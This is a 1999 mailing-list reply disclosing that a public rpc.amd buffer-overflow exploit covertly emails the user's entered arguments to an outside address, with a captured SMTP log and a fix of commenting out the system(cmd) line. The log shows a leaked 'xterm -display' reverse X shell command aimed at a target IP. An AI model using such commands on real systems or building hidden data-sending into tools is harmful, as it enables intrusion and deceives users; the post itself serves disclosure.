Re: Amd exploit

[omri () INAME COM (Locke Montana)]

Hello,
Sorry if this was already known,

recently Someone named Taeho Oh published an exploit
for a buffer overflow in rpc.amd (automount)
While testing this exploit on my on server, i saw 
that i was opening a connection to ohhara.postech.ac.kr
on port 25, After a little research i found out that
The exploit (In it's original form) was sending an email to 
abuser () ohhara postech ac kr  and listing the arguments i
just entered, 
There is an easy way to stop it from sending

Just comment the line: system(cmd);

Here's the log as i got it from sniffit:
EHLO
BlackMesa.com                                                              
MAIL From:<locke () BlackMesa com>
SIZE=95                                          
RCPT
To:<abuser () ohhara postech ac kr>                                           
DATA                                                                            
Received: (from
root@localhost)                                                 
        by BlackMesa.com (8.9.3/8.9.3) id
FAA01208                              
        for abuser () ohhara postech ac kr; Sat, 4 Sep 1999
05:30:56 +0200         
Date: Sat, 4 Sep 1999 05:30:56
+0200                                            
From: locke
<locke () BlackMesa com>                                                 
Message-Id:
<199909040330.FAA01208 () BlackMesa com>                               
To:
abuser () ohhara postech ac kr                                                 
                                                                                
10.0.0.9 /usr/X11R6/bin/xterm -display
10.0.0.8:0                   
.                                                                               
QUIT                                                                            
QUIT                                             

(Ip's changed to protect the innocent)
                                        Bye